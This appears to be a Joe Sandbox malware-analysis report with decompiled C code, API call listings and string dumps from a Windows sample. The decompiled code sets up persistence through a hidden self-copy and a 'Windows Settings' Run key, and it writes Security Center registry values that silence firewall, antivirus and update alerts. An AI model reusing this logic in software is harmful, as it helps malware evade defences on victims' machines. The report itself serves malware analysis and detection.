                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "AntiVirusDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesOverride", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegSetValueExA(_v1064, "UpdatesDisableNotify", 0, 4,  &_v528, 4);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    								if((E0040B1C0() & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                    									__imp__#115(0x202,  &_v3044);
                                                                                                                                                                                                                                                                                    									wsprintfW(0x416be8, L"%s\\tbnds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									wsprintfW(0x4165c8, L"%s\\tbcmds.dat",  &_v2636);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004043F0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E004054A0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    									CreateThread(0, 0, E00405CF0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									Sleep(0x2710);
                                                                                                                                                                                                                                                                                    									E004045F0();
                                                                                                                                                                                                                                                                                    									E00405BA0(E0040D020(),  &_v2636);
                                                                                                                                                                                                                                                                                    									 *0x416e0c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                                    									 *0x416e14 = E0040A8F0( &_v2636);
                                                                                                                                                                                                                                                                                    									 *0x416e10 = E0040BAF0( &_v2636);
                                                                                                                                                                                                                                                                                    									E00409D40();
                                                                                                                                                                                                                                                                                    									_t253 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t253, 0, E0040BFB0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t149 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t149, 0, E0040BF10, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t219 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t219, 0, E0040BAA0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    									_t254 =  *0x416e10; // 0x0
                                                                                                                                                                                                                                                                                    									E0040BBA0(_t254, 0, E0040B8A0, 0, 0, 0);
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								return 0;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t179 = E0040D0F0(); // executed
                                                                                                                                                                                                                                                                                    							if((_t179 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    								ExpandEnvironmentStringsW(L"%windir%",  &_v2108, 0x104);
                                                                                                                                                                                                                                                                                    								wsprintfW( &_v1588, L"%s\\%s",  &_v2108, 0x414bf0);
                                                                                                                                                                                                                                                                                    								_t286 = _t279 + 0x10;
                                                                                                                                                                                                                                                                                    								_t184 = CopyFileW("C:\Users\Albus\AppData\Local\Temp\2550821914.exe",  &_v1588, 0); // executed
                                                                                                                                                                                                                                                                                    								if(_t184 == 0) {
                                                                                                                                                                                                                                                                                    									L24:
                                                                                                                                                                                                                                                                                    									Sleep(0x1f4);
                                                                                                                                                                                                                                                                                    									wsprintfW( &_v1060, L"%s\\%s",  &_v2636, 0x414bf0);
                                                                                                                                                                                                                                                                                    									_t279 = _t286 + 0x10;
                                                                                                                                                                                                                                                                                    									if(CopyFileW(?str?,  &_v1060, 0) == 0) {
                                                                                                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									SetFileAttributesW( &_v1060, 3);
                                                                                                                                                                                                                                                                                    									if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064) != 0) {
                                                                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                                                                    										_t192 = E0040D390( &_v1060);
                                                                                                                                                                                                                                                                                    										_t279 = _t279 + 4;
                                                                                                                                                                                                                                                                                    										if((_t192 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    											goto L31;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										ExitProcess(0);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_v3084 =  &_v1060;
                                                                                                                                                                                                                                                                                    									_v3088 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                                                                    										_v3090 =  *_v3084;
                                                                                                                                                                                                                                                                                    										_v3084 = _v3084 + 2;
                                                                                                                                                                                                                                                                                    									} while (_v3090 != 0);
                                                                                                                                                                                                                                                                                    									_v3096 = _v3084 - _v3088 >> 1;
                                                                                                                                                                                                                                                                                    									RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1060, _v3096 + _v3096 + 2);
                                                                                                                                                                                                                                                                                    									RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								SetFileAttributesW( &_v1588, 3); // executed
                                                                                                                                                                                                                                                                                    								_t202 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0x20006,  &_v1064); // executed
                                                                                                                                                                                                                                                                                    								if(_t202 != 0) {
                                                                                                                                                                                                                                                                                    									L22:
                                                                                                                                                                                                                                                                                    									_t203 = E0040D390( &_v1588); // executed
                                                                                                                                                                                                                                                                                    									_t286 = _t286 + 4;
                                                                                                                                                                                                                                                                                    									if((_t203 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    										goto L24;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									ExitProcess(0); // executed
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_v3068 =  &_v1588;
                                                                                                                                                                                                                                                                                    								_v3072 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									_v3074 =  *_v3068;
                                                                                                                                                                                                                                                                                    									_v3068 = _v3068 + 2;
                                                                                                                                                                                                                                                                                    								} while (_v3074 != 0);
                                                                                                                                                                                                                                                                                    								_v3080 = _v3068 - _v3072 >> 1;
                                                                                                                                                                                                                                                                                    								RegSetValueExW(_v1064, L"Windows Settings", 0, 1,  &_v1588, _v3080 + _v3080 + 2); // executed
                                                                                                                                                                                                                                                                                    								RegCloseKey(_v1064);
                                                                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							ExitProcess(0);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t129 = _v3052;
                                                                                                                                                                                                                                                                                    						_t245 =  *((intOrPtr*)(_t129 + 2));
                                                                                                                                                                                                                                                                                    						_v3056 = _t245;
                                                                                                                                                                                                                                                                                    						_t25 = _v3048 + 2; // 0x790073
                                                                                                                                                                                                                                                                                    						if(_t245 !=  *_t25) {
                                                                                                                                                                                                                                                                                    							break;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_v3052 = _v3052 + 4;
                                                                                                                                                                                                                                                                                    						_v3048 = _v3048 + 4;
                                                                                                                                                                                                                                                                                    						if(_v3056 != 0) {
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                                                    					asm("sbb eax, 0xffffffff");
                                                                                                                                                                                                                                                                                    					_v3060 = _t129;
                                                                                                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				ExitProcess(0);
                                                                                                                                                                                                                                                                                    			}














































                                                                                                                                                                                                                                                                                    0x00405e1e
                                                                                                                                                                                                                                                                                    0x00405e24
                                                                                                                                                                                                                                                                                    0x00405e2e
                                                                                                                                                                                                                                                                                    0x00405e38
                                                                                                                                                                                                                                                                                    0x00405e4b
                                                                                                                                                                                                                                                                                    0x00405e53
                                                                                                                                                                                                                                                                                    0x00405e61
                                                                                                                                                                                                                                                                                    0x00405e71
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e81
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405e90
                                                                                                                                                                                                                                                                                    0x00405ea1
                                                                                                                                                                                                                                                                                    0x00405ea7
                                                                                                                                                                                                                                                                                    0x00405eb8
                                                                                                                                                                                                                                                                                    0x00405ec2
                                                                                                                                                                                                                                                                                    0x00405ecc
                                                                                                                                                                                                                                                                                    0x00405ee2
                                                                                                                                                                                                                                                                                    0x00405ef3
                                                                                                                                                                                                                                                                                    0x00405f0a
                                                                                                                                                                                                                                                                                    0x00405f10
                                                                                                                                                                                                                                                                                    0x00405f1a
                                                                                                                                                                                                                                                                                    0x00405f31
                                                                                                                                                                                                                                                                                    0x00405f37
                                                                                                                                                                                                                                                                                    0x00405f47
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f4d
                                                                                                                                                                                                                                                                                    0x00405f53
                                                                                                                                                                                                                                                                                    0x00405f56
                                                                                                                                                                                                                                                                                    0x00405f66
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f70
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fa7
                                                                                                                                                                                                                                                                                    0x00405fbe
                                                                                                                                                                                                                                                                                    0x00405fc4
                                                                                                                                                                                                                                                                                    0x00405fd1
                                                                                                                                                                                                                                                                                    0x0040623a
                                                                                                                                                                                                                                                                                    0x0040623f
                                                                                                                                                                                                                                                                                    0x00406265
                                                                                                                                                                                                                                                                                    0x00406284
                                                                                                                                                                                                                                                                                    0x004062a3
                                                                                                                                                                                                                                                                                    0x004062c2
                                                                                                                                                                                                                                                                                    0x004062e1
                                                                                                                                                                                                                                                                                    0x00406300
                                                                                                                                                                                                                                                                                    0x0040631f
                                                                                                                                                                                                                                                                                    0x0040633e
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x0040634b
                                                                                                                                                                                                                                                                                    0x00406371
                                                                                                                                                                                                                                                                                    0x00406390
                                                                                                                                                                                                                                                                                    0x004063af
                                                                                                                                                                                                                                                                                    0x004063ce
                                                                                                                                                                                                                                                                                    0x004063ed
                                                                                                                                                                                                                                                                                    0x0040640c
                                                                                                                                                                                                                                                                                    0x0040642b
                                                                                                                                                                                                                                                                                    0x0040644a
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406457
                                                                                                                                                                                                                                                                                    0x00406462
                                                                                                                                                                                                                                                                                    0x00406472
                                                                                                                                                                                                                                                                                    0x00406484
                                                                                                                                                                                                                                                                                    0x0040649b
                                                                                                                                                                                                                                                                                    0x004064b5
                                                                                                                                                                                                                                                                                    0x004064cd
                                                                                                                                                                                                                                                                                    0x004064d8
                                                                                                                                                                                                                                                                                    0x004064ed
                                                                                                                                                                                                                                                                                    0x004064f8
                                                                                                                                                                                                                                                                                    0x0040650d
                                                                                                                                                                                                                                                                                    0x00406518
                                                                                                                                                                                                                                                                                    0x0040651e
                                                                                                                                                                                                                                                                                    0x00406528
                                                                                                                                                                                                                                                                                    0x0040653b
                                                                                                                                                                                                                                                                                    0x00406545
                                                                                                                                                                                                                                                                                    0x0040654f
                                                                                                                                                                                                                                                                                    0x00406554
                                                                                                                                                                                                                                                                                    0x00406566
                                                                                                                                                                                                                                                                                    0x0040656d
                                                                                                                                                                                                                                                                                    0x00406582
                                                                                                                                                                                                                                                                                    0x00406588
                                                                                                                                                                                                                                                                                    0x0040659d
                                                                                                                                                                                                                                                                                    0x004065a4
                                                                                                                                                                                                                                                                                    0x004065b9
                                                                                                                                                                                                                                                                                    0x004065c0
                                                                                                                                                                                                                                                                                    0x004065c5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004065cc
                                                                                                                                                                                                                                                                                    0x00405fd7
                                                                                                                                                                                                                                                                                    0x00405fe2
                                                                                                                                                                                                                                                                                    0x00405ffd
                                                                                                                                                                                                                                                                                    0x0040601b
                                                                                                                                                                                                                                                                                    0x00406021
                                                                                                                                                                                                                                                                                    0x00406032
                                                                                                                                                                                                                                                                                    0x0040603a
                                                                                                                                                                                                                                                                                    0x00406119
                                                                                                                                                                                                                                                                                    0x0040611e
                                                                                                                                                                                                                                                                                    0x0040613c
                                                                                                                                                                                                                                                                                    0x00406142
                                                                                                                                                                                                                                                                                    0x0040615b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040616a
                                                                                                                                                                                                                                                                                    0x00406190
                                                                                                                                                                                                                                                                                    0x0040621b
                                                                                                                                                                                                                                                                                    0x00406222
                                                                                                                                                                                                                                                                                    0x00406227
                                                                                                                                                                                                                                                                                    0x00406230
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x00406234
                                                                                                                                                                                                                                                                                    0x0040619c
                                                                                                                                                                                                                                                                                    0x004061ab
                                                                                                                                                                                                                                                                                    0x004061b1
                                                                                                                                                                                                                                                                                    0x004061ba
                                                                                                                                                                                                                                                                                    0x004061c1
                                                                                                                                                                                                                                                                                    0x004061c8
                                                                                                                                                                                                                                                                                    0x004061e0
                                                                                                                                                                                                                                                                                    0x00406208
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406215
                                                                                                                                                                                                                                                                                    0x00406049
                                                                                                                                                                                                                                                                                    0x00406067
                                                                                                                                                                                                                                                                                    0x0040606f
                                                                                                                                                                                                                                                                                    0x004060fa
                                                                                                                                                                                                                                                                                    0x00406101
                                                                                                                                                                                                                                                                                    0x00406106
                                                                                                                                                                                                                                                                                    0x0040610f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x00406113
                                                                                                                                                                                                                                                                                    0x0040607b
                                                                                                                                                                                                                                                                                    0x0040608a
                                                                                                                                                                                                                                                                                    0x00406090
                                                                                                                                                                                                                                                                                    0x00406099
                                                                                                                                                                                                                                                                                    0x004060a0
                                                                                                                                                                                                                                                                                    0x004060a7
                                                                                                                                                                                                                                                                                    0x004060bf
                                                                                                                                                                                                                                                                                    0x004060e7
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x004060f4
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405fe6
                                                                                                                                                                                                                                                                                    0x00405f72
                                                                                                                                                                                                                                                                                    0x00405f78
                                                                                                                                                                                                                                                                                    0x00405f7c
                                                                                                                                                                                                                                                                                    0x00405f89
                                                                                                                                                                                                                                                                                    0x00405f8d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405f8f
                                                                                                                                                                                                                                                                                    0x00405f96
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fa5
                                                                                                                                                                                                                                                                                    0x00405fb3
                                                                                                                                                                                                                                                                                    0x00405fb5
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00405fb8
                                                                                                                                                                                                                                                                                    0x00405ebc

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000BB8), ref: 00405E1E
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(2393737939739), ref: 00405E4B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00405E61
                                                                                                                                                                                                                                                                                    • MoveFileA.KERNEL32(337372927,2282688262), ref: 00405E71
                                                                                                                                                                                                                                                                                    • MoveFileW.KERNEL32 ref: 00405E81
                                                                                                                                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,2u9o0b7n), ref: 00405EA1
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00405EAD
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405EBC
                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\2550821914.exe,00000105), ref: 00405EE2
                                                                                                                                                                                                                                                                                    • PathFindFileNameW.SHLWAPI(C:\Users\user\AppData\Local\Temp\2550821914.exe), ref: 00405EED
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00405F0A
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 00405F1A
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405F31
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00405FE6
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405FFD
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040601B
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406032
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(?,00000003), ref: 00406049
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32 ref: 00406067
                                                                                                                                                                                                                                                                                    • RegSetValueExW.KERNEL32 ref: 004060E7
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 004060F4
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406113
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040611E
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040613C
                                                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00406153
                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000003), ref: 0040616A
                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32 ref: 00406188
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32 ref: 00406208
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406215
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00406234
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 0040623F
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 0040625D
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406284
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004062A3
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004062C2
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004062E1
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406300
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040631F
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040633E
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040634B
                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 00406369
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00406390
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004063AF
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004063CE
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 004063ED
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 0040640C
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040642B
                                                                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040644A
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00406457
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 00406462
                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00406484
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040649B
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 004064B5
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004043F0,00000000,00000000,00000000), ref: 004064CD
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064D8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,004054A0,00000000,00000000,00000000), ref: 004064ED
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 004064F8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00405CF0,00000000,00000000,00000000), ref: 0040650D
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00406518
                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406535
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.381763276.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381759429.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381771790.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381777020.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.381782946.0000000000416000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_2550821914.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$CopyThread$AttributesEnvironmentExpandMoveNamePathStrings$DeleteErrorEventExistsFindLastModuleMutexStartup
                                                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$038038$2282688262$2393737939739$297973937,$2u9o0b7n$333383737$337372927$33973397337$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\AppData\Local\Temp\2550821914.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$Z#
                                                                                                                                                                                                                                                                                    • API String ID: 2549499605-1197097588
                                                                                                                                                                                                                                                                                    • Opcode ID: ef92d689a96c8412123f0e4fb90ddc0662b6d0b5b4c5dbf683da85d03ef3d0d0
                                                                                                                                                                                                                                                                                    • Instruction ID: 83af2952ddda4d09f50abae1b8075a5cb95368c24024515adc0fadd5cc82fc98
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef92d689a96c8412123f0e4fb90ddc0662b6d0b5b4c5dbf683da85d03ef3d0d0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1122EB1B80318ABE7209B50DC4AFD97774EB48B05F5081A5B309AA1D1D7F4AAC4CF5D
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 68 40d390-40d3ee memset CreateProcessW 69 40d3f0-40d3fd Sleep 68->69 70 40d3ff-40d423 ShellExecuteW 68->70 71 40d436-40d439 69->71 72 40d434 70->72 73 40d425-40d432 Sleep 70->73 72->71 73->71
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E0040D390(char _a4) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                    				struct _STARTUPINFOW _v100;
                                                                                                                                                                                                                                                                                    				intOrPtr _v104;
                                                                                                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset( &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                    				_v24.hProcess = 0;
                                                                                                                                                                                                                                                                                    				_v24.hThread = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwProcessId = 0;
                                                                                                                                                                                                                                                                                    				_v24.dwThreadId = 0;
                                                                                                                                                                                                                                                                                    				_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                    				_v100.dwFlags = 1;
                                                                                                                                                                                                                                                                                    				_v100.wShowWindow = 5;
                                                                                                                                                                                                                                                                                    				_t11 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    				_t20 = CreateProcessW(0,  *_t11, 0, 0, 0, 0x20, 0, 0,  &_v100,  &_v24); // executed
                                                                                                                                                                                                                                                                                    				if(_t20 != 1) {
                                                                                                                                                                                                                                                                                    					_t12 =  &_a4; // 0x406227
                                                                                                                                                                                                                                                                                    					_v8 = ShellExecuteW(0, L"open",  *_t12, 0, 0, 0);
                                                                                                                                                                                                                                                                                    					_v104 = _v8;
                                                                                                                                                                                                                                                                                    					if(_v104 <= 0x20) {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0x3e8);
                                                                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                                    				return 1;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x0040d39e
                                                                                                                                                                                                                                                                                    0x0040d3a8
                                                                                                                                                                                                                                                                                    0x0040d3ab
                                                                                                                                                                                                                                                                                    0x0040d3ae
                                                                                                                                                                                                                                                                                    0x0040d3b1
                                                                                                                                                                                                                                                                                    0x0040d3b4
                                                                                                                                                                                                                                                                                    0x0040d3bb
                                                                                                                                                                                                                                                                                    0x0040d3c7
                                                                                                                                                                                                                                                                                    0x0040d3df
                                                                                                                                                                                                                                                                                    0x0040d3e5
                                                                                                                                                                                                                                                                                    0x0040d3ee
                                                                                                                                                                                                                                                                                    0x0040d405
                                                                                                                                                                                                                                                                                    0x0040d416
                                                                                                                                                                                                                                                                                    0x0040d41c
                                                                                                                                                                                                                                                                                    0x0040d423
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d434
                                                                                                                                                                                                                                                                                    0x0040d42a
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040d430
                                                                                                                                                                                                                                                                                    0x0040d3f5
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
